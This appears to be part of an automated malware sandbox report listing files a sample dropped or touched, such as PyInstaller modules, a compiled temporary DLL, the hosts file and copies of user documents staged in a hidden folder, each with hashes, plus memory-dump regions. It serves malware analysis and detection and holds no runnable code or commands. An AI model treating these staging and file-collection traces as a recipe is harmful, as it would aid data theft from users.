4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\select.pyd

Filesize
24KB

MD5
062f0a9179c51d7ed621dac3dd222abd

SHA1
c7b137a2b1e7b16bfc6160e175918f4d14cf107c

SHA256
91bea610f607c8a10c2e70d687fb02c06b9e1e2fa7fcfab355c6baea6eddb453

SHA512
b5a99efd032f381d63bc46c9752c1ddec902dae7133a696e20d3d798f977365caf25874b287b19e6c52f3e7a8ae1beb3d7536cd114775dc0af4978f21a9e818e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\sqlite3.dll

Filesize
606KB

MD5
dcc391b3b52bac0f6bd695d560d7f1a9

SHA1
a061973a5f7c52c34a0b087cc918e29e3e704151

SHA256
762adf4e60bff393fba110af3d9694cbbdc3c6b6cd18855a93411ea8e71a4859

SHA512
42a2606783d448200c552389c59cbf7c5d68a00911b36e526af013e9b8e3a1daa80327cb30efe0fe56323635cc2cb37bd3474b002058ba59f65e2a9d8f6046b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\unicodedata.pyd

Filesize
294KB

MD5
26f7ccda6ba4de5f310da1662f91b2ba

SHA1
5fb9472a04d6591ec3fee7911ad5b753c62ecf17

SHA256
1eae07acffb343f4b3a0abbaf70f93b9ec804503598cfffdeec94262b3f52d60

SHA512
0b5e58945c00eefc3b9f21a73359f5751966c58438ae9b86b6d3ffd0f60a648676b68a0109fa2fe1260d1b16c16b026e0c1d596fec3443638d4ce05ea04665ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d2xevi4w.11j.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dziryqwn\dziryqwn.dll

Filesize
4KB

MD5
3a6a3caf7f1fe239a32cc2b84ee20a1a

SHA1
1ee8f919345936a7ef032d4621745bedaa22aade

SHA256
c51155bbd55ceba8b7b3412fcd0ef7db559a1c8d33c2ee00b087b57c1019ff93

SHA512
2e6310e2c607230e483c1cfa18fce63b37c3659c68c4dc80561595ae00f59b085a4fec1bd69c3e3d6b7f6bf29e79659487abc0f9cc76efc48003ec634ad170bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Desktop\CloseSubmit.jpeg

Filesize
666KB

MD5
131206260f5591c0605c1356daaa8248

SHA1
4dc4842b189392bb5f3145ee242e5733709be207

SHA256
ccc2aca0b768e64ebca516768ae5219c65db2558602c54e3c970ee0c0084e879

SHA512
cd587d92d5f9816f4d5306b471820bdd13b64900727c12c8965ac9c626f0098932372ba27eb958b8874cfe6e35d8c4eaa3605f57486df1e4b8c7140504d26e8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Desktop\DenyExport.docx

Filesize
599KB

MD5
f81770362f8b3e92ed731360dc2dd292

SHA1
a2976c8a2b3879df972dbb93036e0688c466f855

SHA256
0b7b7a5435d2167dfed8305bc34eb9774aa1abd119c269ecccce8bb9a037b6e6

SHA512
7fce30be2b47a7854b215a27316aee4bb37fec0a3c66f92c186c8adbf546dc1eac0e4816e966134f4ca343cab5278e223392b5910022b6564d2c00959a6f2011

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Desktop\OptimizeConvertTo.mp3

Filesize
821KB

MD5
f391f5ad8b4f661965a15e7379118482

SHA1
5ad7fe32167513c2e80c3b7fdd4c1f18ddfe4166

SHA256
32537656696837bd8e66b802c7865a95cd59b3e93e21953a29686629c645526c

SHA512
ed922418a890086939c03346876eb22c022d953acaa4c2fd162d2ece321f86d7ec1b139333cebbfdebacbef3c86a912ef1043c422850af5fbdd41acbfdc89715

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Desktop\SubmitShow.docx

Filesize
16KB

MD5
2a9429d54fea7e85ad3b366ac10feafc

SHA1
a0b30e2f7b24c3b2ba37f62370f2738ab51d6c28

SHA256
7c8312372d07e9321410aaebe7f7ce7ed4c2c8a63f5e9ec62577306964f13b64

SHA512
6e15bcc6887a80bddf23d37d9ba92b1ab56d8e85b11b78e43a1cf6071c25089d167ffc23acf71abdc2aee96ee8a93231de68f81a59c226e2d5b17cfba022b439

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Desktop\UndoUnlock.xlsx

Filesize
13KB

MD5
0d287c5f32077caa366462b6c0b0ad97

SHA1
633c72d1ccc713e98a9986bb452ed8b8604c9af8

SHA256
ac7fd6a83b3fca51868ce2d94fe5fbbbf123ffcbefff5f4b881ca6f6073de550

SHA512
c4d519b8d55ca465df8a481d8c2c6e6af40f1ac53b3b2ad3fccaa75f7366153d003790790a3474c64e50578ba329394bda518841bfa0ed6f5d4911798d94178b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Documents\EnableDisconnect.docx

Filesize
13KB

MD5
9ec37dfb726eba3317e5019ac4d008d6

SHA1
9011caf8134a62fe233d57a0b1b527c852b14f66

SHA256
1102acf6bdbd902e112b2e3792cb489e8534e1b130ca85b25564b1318d13d5bc

SHA512
adc48efc03ab292687b98b2939645257ecfbf35ab86796c14b1f12027bccdb711c3875d6ba01fbd281049a74e93b03743f5c277bca330c9183aeaf3b76d7c473

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Documents\MountUnblock.xlsx

Filesize
10KB

MD5
528e9512b08f1f93ef0ab7608a689e5b

SHA1
f361b82a684aea37f9882dae344bb9af0fcd6173

SHA256
e679db6d1623c334787ebc6f60ccfc890957e7d227acc18e2a69bb1b8ed07e87

SHA512
83b23caffea2a6f42f9c465d1e10192bbe4b19fef9277354fd562cd658e03b5cb400c24a8d6623c38bb8e6022c875fa3105bb91cbf89b763c665034b18d9cc4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Documents\OpenDebug.xlsx

Filesize
11KB

MD5
3575462b36310686ed0aeccdf3419ecd

SHA1
6f7431dff17775e3f6b036f4e83c1e6b2f1b81f0

SHA256
afb18929ebf9670073b390a5d8edeb0abc15997bd45e9cad8a6262752b9e8728

SHA512
92888e08f5b3b2ad1b7ebb9b80c94ccd912f00731c2e7255cd99fa6cbc11093001bedd077a0a74b07dd8ceea96e7aaa04c74853a9bf4828e7808927f0e1efd3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Documents\PingClear.doc

Filesize
1.6MB

MD5
3543b1ee61b4a03e8261b2d611f635b4

SHA1
043c4c576237fadd17639788b995022465d293b9

SHA256
7856e300abaac5ffe0aab4f3cd8491a5bcc93f2be24f75c592f4c6eb51c5342e

SHA512
31936370d8366de271e2a6dcad0279e6d2178018b44919d819028062d2ad06a8865f7eae305aff5dcdbadf3e70caa676b5887cb4b862c6f257a3b751ffc54cad

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Documents\ShowUnlock.xls

Filesize
1.2MB

MD5
b90fc8928bb2c26b5a7bde69bf63ea49

SHA1
e01a7e5b2f2a5ed1d8f35dbe626e1ec09bf574c9

SHA256
d29cb84ae6d26858f30b5ac5c2a42e08d21e20f6a4470b9bace45b8c9fc36368

SHA512
6f8f21e15769f017ce2939599f2bdd9feac28c96b926a6296b9ba750de0bd0d6d71272c796e1c5174df9d0c6fb296651add4896552af5f373e3742cf1835f0dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Documents\SubmitSync.xlsx

Filesize
11KB

MD5
8214fb9276e1ba7bc43931b8ea128832

SHA1
e67955236b0b8aac2cca80c7fdddf3ee6f48f467

SHA256
0f9d7aa548e6ab36914bd1b5d6a4dd4043b188e1349e43eac68a149f9958758a

SHA512
739fec166de4eb48e94d592ff411c1a2c1f59128c73012e705fdcb37b5b34080d296751f22285527e967fd00f35d4c0d8ca014f8ec9e30ea054c5c6952f31ddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\‌ ‌ \Common Files\Documents\SwitchOpen.docx

Filesize
13KB

MD5
13a85324168381043607259d7f946e32

SHA1
fd2cef91b46e85f3d6b760a44a84e1111f67e7af

SHA256
7500bfc599952361bba1c04c4eda72cd699fc7668ec1273024043c0a63a26881

SHA512
856b4d4f2d26472082e60be5efbe6a2f0f5a51444d67671eb1775e89a7e9ff7df6467b1f14f5d3df53fc2217df779ef245a7e75932f574c865af4a88dd8d5622

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dziryqwn\CSC394C470BB4AC4364A4B6BBB0DA47C5AA.TMP

Filesize
652B

MD5
8ae6924ed9b3321c59f07f35b5429a98

SHA1
6ff982dc9c3a66a7b632f76a18f7e8a43181aa48

SHA256
f9892129e92aa9df8698a395a7e14e7a98c7bf6e17101f4d7bca9d6b20792cc6

SHA512
0595de2c185fd97927c8a25228631399955e5d845d246af5deb0eb103db2df725a3cb12c9461935f970b0474439ad38d5f1c70603c9190104b5a3fcceaf5de07

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dziryqwn\dziryqwn.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dziryqwn\dziryqwn.cmdline

Filesize
607B

MD5
431b8eca3ab312f4a7db758a48c92f0c

SHA1
47a8201f1944c04329e414dbac6953297fc1747b

SHA256
4e42cf4f787a0540945519a94835e032bf6e362fb2aeab456f628ab221a510a6

SHA512
ee32920b80a6db5636899cccb56bb70b365c331ad4df673b00a149b79cafb2cb47ff0be1e0cf2d0163739b7c148062f0ec9c7c958dc8441d602303cb1ee357c6

Download Submit
memory/1704-54-0x00007FFA8EA70000-0x00007FFA8EA9D000-memory.dmp

Filesize
180KB

Download
memory/1704-337-0x00007FFA8BA60000-0x00007FFA8BA79000-memory.dmp

Filesize
100KB

Download
memory/1704-119-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp

Filesize
1.4MB

Download
memory/1704-106-0x00007FFA8BA80000-0x00007FFA8BAA3000-memory.dmp

Filesize
140KB

Download
memory/1704-72-0x0000028777670000-0x00000287779E5000-memory.dmp

Filesize
3.5MB

Download
memory/1704-73-0x00007FFA7B640000-0x00007FFA7B9B5000-memory.dmp

Filesize
3.5MB

Download
memory/1704-74-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp

Filesize
144KB

Download
memory/1704-315-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp

Filesize
5.9MB

Download
memory/1704-70-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp

Filesize
5.9MB

Download
memory/1704-66-0x00007FFA8B380000-0x00007FFA8B3AE000-memory.dmp

Filesize
184KB

Download
memory/1704-64-0x00007FFA8EF10000-0x00007FFA8EF1D000-memory.dmp

Filesize
52KB

Download
memory/1704-260-0x00007FFA8B380000-0x00007FFA8B3AE000-memory.dmp

Filesize
184KB

Download
memory/1704-265-0x0000028777670000-0x00000287779E5000-memory.dmp

Filesize
3.5MB

Download
memory/1704-264-0x00007FFA8AF80000-0x00007FFA8B038000-memory.dmp

Filesize
736KB

Download
memory/1704-62-0x00007FFA8BA60000-0x00007FFA8BA79000-memory.dmp

Filesize
100KB

Download
memory/1704-58-0x00007FFA8BA80000-0x00007FFA8BAA3000-memory.dmp

Filesize
140KB

Download
memory/1704-60-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp

Filesize
1.4MB

Download
memory/1704-56-0x00007FFA92BA0000-0x00007FFA92BB9000-memory.dmp

Filesize
100KB

Download
memory/1704-78-0x00007FFA8BB90000-0x00007FFA8BB9D000-memory.dmp

Filesize
52KB

Download
memory/1704-48-0x00007FFA945E0000-0x00007FFA945EF000-memory.dmp

Filesize
60KB

Download
memory/1704-30-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp

Filesize
144KB

Download
memory/1704-25-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp

Filesize
5.9MB

Download
memory/1704-71-0x00007FFA8AF80000-0x00007FFA8B038000-memory.dmp

Filesize
736KB

Download
memory/1704-327-0x00007FFA8B840000-0x00007FFA8B854000-memory.dmp

Filesize
80KB

Download
memory/1704-76-0x00007FFA8B840000-0x00007FFA8B854000-memory.dmp

Filesize
80KB

Download
memory/1704-80-0x00007FFA7B520000-0x00007FFA7B63C000-memory.dmp

Filesize
1.1MB

Download
memory/1704-279-0x00007FFA7B640000-0x00007FFA7B9B5000-memory.dmp

Filesize
3.5MB

Download
memory/1704-299-0x00007FFA7BB80000-0x00007FFA7C169000-memory.dmp

Filesize
5.9MB

Download
memory/1704-305-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp

Filesize
1.4MB

Download
memory/1704-300-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp

Filesize
144KB

Download
memory/1704-335-0x00007FFA8BA80000-0x00007FFA8BAA3000-memory.dmp

Filesize
140KB

Download
memory/1704-340-0x00007FFA8AF80000-0x00007FFA8B038000-memory.dmp

Filesize
736KB

Download
memory/1704-339-0x00007FFA8B380000-0x00007FFA8B3AE000-memory.dmp

Filesize
184KB

Download
memory/1704-338-0x00007FFA8EF10000-0x00007FFA8EF1D000-memory.dmp

Filesize
52KB

Download
memory/1704-177-0x00007FFA8BA60000-0x00007FFA8BA79000-memory.dmp

Filesize
100KB

Download
memory/1704-336-0x00007FFA8B480000-0x00007FFA8B5F0000-memory.dmp

Filesize
1.4MB

Download
memory/1704-334-0x00007FFA92BA0000-0x00007FFA92BB9000-memory.dmp

Filesize
100KB

Download
memory/1704-333-0x00007FFA8EA70000-0x00007FFA8EA9D000-memory.dmp

Filesize
180KB

Download
memory/1704-332-0x00007FFA945E0000-0x00007FFA945EF000-memory.dmp

Filesize
60KB

Download
memory/1704-331-0x00007FFA8EAE0000-0x00007FFA8EB04000-memory.dmp

Filesize
144KB

Download
memory/1704-330-0x00007FFA7B640000-0x00007FFA7B9B5000-memory.dmp

Filesize
3.5MB

Download
memory/1704-329-0x00007FFA7B520000-0x00007FFA7B63C000-memory.dmp

Filesize
1.1MB

Download
memory/1704-328-0x00007FFA8BB90000-0x00007FFA8BB9D000-memory.dmp

Filesize
52KB

Download
memory/3520-88-0x0000019874920000-0x0000019874942000-memory.dmp

Filesize
136KB

Download
memory/4692-192-0x0000011AD9EC0000-0x0000011AD9EC8000-memory.dmp

Filesize
32KB

Download